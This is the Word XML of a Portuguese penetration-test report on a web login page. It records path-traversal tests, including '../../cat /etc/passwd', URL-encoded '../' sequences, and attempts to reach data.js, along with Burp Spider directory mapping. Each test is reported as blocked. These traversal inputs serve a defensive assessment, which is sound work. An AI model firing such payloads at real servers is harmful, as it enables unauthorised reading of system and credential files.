        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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F15F82" w:rsidRDefault="00D76012" w:rsidP="00284BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707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.</w:t>
      </w:r>
      <w:r w:rsidR="00B959F5" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Não foi possível obter o acesso a qualquer outra parte do sistema.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48383A" w:rsidP="00284BB3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2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284BB3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="707" w:firstLine="708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Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r w:rsidR="002D4365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/login.php?logado= ../../cat /etc/passwd, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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Pr="00F15F82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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00630433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O comando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“../../” foi utilizado para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor no qual a aplicação está hospedada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00630433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comando </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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cat /etc/passwd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, no sistema operacional Linux, serve para listar o conteúdo de passwd (local onde ficam armazenados informações de senha dos usuários). Como o sistema operacional do servidor em questão é Windows, então caso seja executado, o esperado seria um erro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817857" w:rsidRPr="00817857" w:rsidRDefault="00817857" w:rsidP="00284BB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817857" w:rsidRPr="00284BB3" w:rsidRDefault="00817857" w:rsidP="00284BB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84BB3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817857" w:rsidRPr="00284BB3" w:rsidRDefault="00817857" w:rsidP="00284BB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284BB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que o sistema bloqueie o acesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817857" w:rsidRPr="00817857" w:rsidRDefault="00817857" w:rsidP="00817857">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="696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817857" w:rsidRDefault="005967D5" w:rsidP="00817857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3164B7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00817857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.</w:t>
      </w:r>
      <w:r w:rsidR="003164B7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="00544368" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Não foi possível obter o acesso a qualquer outra parte do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="0048383A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817857" w:rsidRDefault="008C6DC7" w:rsidP="00817857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Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r w:rsidR="002D4365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/login.php?logado=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e%2f%2e%2e%2f (código equivalente a </w:t>
      </w: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../../), </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00830E80" w:rsidP="00817857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O comando “../../” serve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para tentar a navegação de forma forçada dentro da estrutura de pastas do sistema operacional do servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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817857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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817857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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817857" w:rsidRPr="00F15F82" w:rsidRDefault="00817857" w:rsidP="00817857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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que o sistema bloqueie o acesso.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17857" w:rsidRDefault="005967D5" w:rsidP="00817857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F15F82" w:rsidRDefault="00D76012" w:rsidP="00817857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.</w:t>
      </w:r>
      <w:r w:rsidR="003164B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Não foi possível obter o acesso a qualquer outra parte do sistema.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48383A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4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C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00284BB3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Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r w:rsidR="002D4365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/login.php?logado=../data.js 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para acessar o arquivo “data.js”, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00284BB3" w:rsidP="0063043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C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>comando “../” serve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para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional do servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00284BB3" w:rsidP="0063043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“</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="006C31FD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ata.js</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é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um arquivo descoberto através do es</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">caneamento realizado pela funcionalidade </w:t>
      </w:r>
      <w:r w:rsidR="00E158B8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Burp Spider</w:t>
      </w:r>
      <w:r w:rsidR="00C8356E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,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a ferramenta</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="00C8356E" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004E12C9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para mapear a estrutura de pastas da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00284BB3" w:rsidRDefault="00284BB3" w:rsidP="00284BB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84BB3" w:rsidRPr="00284BB3" w:rsidRDefault="00284BB3" w:rsidP="00284BB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84BB3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284BB3" w:rsidRPr="00284BB3" w:rsidRDefault="00284BB3" w:rsidP="00284BB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284BB3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que o sistema bloqueie o acesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00284BB3" w:rsidRPr="00F15F82" w:rsidRDefault="00284BB3" w:rsidP="00284BB3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84BB3" w:rsidRDefault="005967D5" w:rsidP="00284BB3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F15F82" w:rsidRDefault="00D76012" w:rsidP="00284BB3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.</w:t>
      </w:r>
      <w:r w:rsidR="003164B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Não foi possível obter o acesso a qualquer outra parte do sistema.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48383A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C31FD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Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r w:rsidR="002D4365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/login.php?logado=</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82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./</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82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./</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82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./ , </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0836" w:rsidRPr="00F15F82" w:rsidRDefault="002C0836" w:rsidP="002C0836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comando  “../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0836" w:rsidRDefault="002C0836" w:rsidP="002C0836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C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD" w:rsidP="002C0836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</w:t>
      </w:r>
      <w:r w:rsidR="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="003164B7" w:rsidP="002C0836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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Espera-se que o sistema bloqueie o acesso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0836" w:rsidRPr="00F15F82" w:rsidRDefault="002C0836" w:rsidP="002C0836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C0836" w:rsidRDefault="005967D5" w:rsidP="002C0836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F15F82" w:rsidRDefault="00D76012" w:rsidP="002C0836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3164B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Não foi possível obter o acesso a qualquer outra parte do sistema.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48383A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6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C0836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Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r w:rsidR="002D4365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/login.php?login=teste&amp;senha=</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82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./</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82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./</w:t>
      </w:r>
      <w:r w:rsidR="005B5243" w:rsidRPr="00F15F82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./, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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Pr="00F15F82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2C0836" w:rsidRPr="00F15F82" w:rsidRDefault="002C0836" w:rsidP="002C0836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comando  “../../../”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD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15F82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:rsidR="006C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD" w:rsidP="002C0836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</w:t>
      </w:r>
      <w:r w:rsidR="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD" w:rsidP="002C0836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iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> impeça o acesso</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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5967D5" w:rsidP="002C0836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: </w:t>
      </w:r>
      <w:r w:rsidR="00D76012"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3164B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Não foi possível obter o acesso a qualquer outra parte do sistema.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48383A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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">Sessão de teste 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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>7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C31FD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Fazer uma requisição ao servidor utilizando a url </w:t>
      </w:r>
      <w:r w:rsidR="002D4365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/login.php?login=teste&amp;senha=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>..</w:t>
      </w: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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a fim de verificar se o sistema não permite a navegação dentro das pastas armazenadas no servidor que hospeda o </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C0836" w:rsidRPr="002C0836" w:rsidRDefault="006D580D" w:rsidP="002C08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comando</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="002C0836" w:rsidRPr="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”  serve para tentar navegar de forma forçada dentro da estrutura de pastas do sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD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6C31FD" w:rsidRPr="00F15F82" w:rsidRDefault="006C31FD" w:rsidP="002C0836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</w:t>
      </w:r>
      <w:r w:rsidR="002C0836">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esperado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="003164B7" w:rsidP="002C0836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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Espera-se que o sistema bloqueie o acesso. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="002C08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C0836" w:rsidRDefault="005967D5" w:rsidP="002C0836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F15F82" w:rsidRDefault="00D76012" w:rsidP="002C0836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3164B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Não foi possível obter o acesso a qualquer outra parte do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D0F86" w:rsidRPr="00F15F82" w:rsidRDefault="009D0F86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135C4" w:rsidRDefault="00B135C4" w:rsidP="00B135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B135C4" w:rsidP="00B135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135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.3.1.3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Tela Login - Mapeamento da hierarquia de pastas do sistema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Tarefa realizada dia 30/03/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="009D0F86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: 1 hora e 30 minutos.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lastRenderedPageBreak/>
        <w:t>Utilizar de forma automatizada o módulo Burp Spider da ferramen</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ta Burp Suite e a</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> partir da URL da tela de Login: IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidR="00B135C4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/login.php </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizar um reconhecimento da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hierarquia de diretórios do sistema armazenados dentro do servidor. </w:t>
      </w:r>
      <w:r w:rsidR="00B135C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mediante a</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os resultados, verificar se foi possível ter acesso à hierarquia de pastas do sistema mesmo sem efetuar a requisição do login. Além disso, verificar se é possível ter acesso aos códigos da aplicação.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48383A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1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384949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Acessar a página do Login utilizando a url http:// IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema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/login.php. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C36925" w:rsidRPr="00F15F82" w:rsidRDefault="00C36925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36925" w:rsidRPr="00F15F82" w:rsidRDefault="00384949" w:rsidP="00384949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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00C36925" w:rsidP="00384949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spera-se que o sistema não permita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a visualização da hierarquia de pastas do sistema.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84949" w:rsidRDefault="005967D5" w:rsidP="00384949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F15F82" w:rsidRDefault="00D76012" w:rsidP="00384949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. Conforme mostra figura 3, não foi possível mapear a estrutura de pastas do sistema apenas acessando a página de Login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00654DEF" w:rsidRPr="00F15F82" w:rsidRDefault="00654DEF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F64B7" w:rsidRPr="00F15F82" w:rsidRDefault="008A7473" w:rsidP="0038494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5BF9D013" wp14:editId="19B040F2">
            <wp:extent cx="1809750" cy="1276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3(Editada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8C6DC7" w:rsidP="0038494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Cs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3 - Resultado </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de mapeamento diretórios do sistema</w:t>
      </w:r>
